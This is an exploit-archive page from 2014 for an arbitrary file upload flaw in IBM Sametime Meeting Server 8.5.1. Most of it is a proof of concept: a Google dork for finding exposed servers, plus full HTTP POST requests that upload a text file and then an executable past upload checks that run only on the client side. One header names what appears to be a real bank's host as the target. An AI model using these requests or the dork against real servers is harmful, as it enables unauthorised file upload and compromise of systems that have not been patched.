Home / exploitsPDF  

IBM Sametime Meeting Server Arbitrary File Upload

Posted on 01 July 2014

[+] Exploit Title: IBM Sametime Meeting Server Arbitrary File Upload
[+] Google Dork: intitle:"Nova reunião - IBM Lotus Sametime"
[+] Date: 26/06/2014
[+] Exploit Author: Adriano Marcio Monteiro
[+] E-mail Author: adrianomarciomonteiro@gmail.com
[+] Blog Author: http://adrianomarciomonteiro.blogspot.com.br
[+] Vendor Homepage: http://www.ibm.com/us/en/
[+] Software Link: http://www-10.lotus.com/ldd/stwiki.nsf/xpDocViewer.xsp?lookupName=Administering+Sametime+Standard+8.5.2+documentation#action=openDocument&res_title=Sametime_Meeting_Server_st852&content=pdcontent
[+] Version: 8.5.1
[+] Tested on: Windows 7 SP1 x86 pt-br
[+] CVE-ID : Waiting
[+] OSVDB-ID: Waiting

IBM Sametime Meeting Server allow anonymous users to send arbitrary files changing the Content-type post.
The file upload restrictions occurs only client side.

PoC - Proof of Concept

http://sametime02.myserver.com.br/stconf.nsf/frmConference?OpenForm

/* ---------- Original Request ---------- */

POST /stconf.nsf/wAttach?OpenForm&Seq=1&5F1BF7DE56F68DA583257D040071276C0 HTTP/1.1
Host: sametime02.myserver.com.br
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://sametime02.myserver.com.br/stconf.nsf/wAttach?OpenForm&5F1BF7DE56F68DA583257D040071276C0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16704454925606
Content-Length: 729

-----------------------------16704454925606
Content-Disposition: form-data; name="__Click"

0
-----------------------------16704454925606
Content-Disposition: form-data; name="MeetingDocID"

5F1BF7DE56F68DA583257D040071276C
-----------------------------16704454925606
Content-Disposition: form-data; name="AttachFlag"

1
-----------------------------16704454925606
Content-Disposition: form-data; name="AttachList"

Sem Anexos
-----------------------------16704454925606
Content-Disposition: form-data; name="%%File.832578a70066c5a9.116f49cec1616cad85257134007343d5.$Body.0.3206"; filename="OWNED.txt"
Content-Type: text/plain

OWNED BY ADRIANO MARCIO MONTEIRO
-----------------------------16704454925606--

/* ---------- Content Modified ---------- */

POST /stconf.nsf/wAttach?OpenForm&Seq=1&5F1BF7DE56F68DA583257D040071276C0 HTTP/1.1
Host: sametime02.myserver.com.br
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://sametime02.bancobmg.com.br/stconf.nsf/wAttach?OpenForm&5F1BF7DE56F68DA583257D040071276C0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16704454925606
Content-Length: 729

-----------------------------16704454925606
Content-Disposition: form-data; name="__Click"

0
-----------------------------16704454925606
Content-Disposition: form-data; name="MeetingDocID"

5F1BF7DE56F68DA583257D040071276C
-----------------------------16704454925606
Content-Disposition: form-data; name="AttachFlag"

1
-----------------------------16704454925606
Content-Disposition: form-data; name="AttachList"

Sem Anexos
-----------------------------16704454925606
Content-Disposition: form-data; name="%%File.832578a70066c5a9.116f49cec1616cad85257134007343d5.$Body.0.3206"; filename="OWNED.exe"
Content-Type: application/octet-stream

...EXE Content...

-----------------------------16704454925606--

 

TOP

Malware :

Exploits :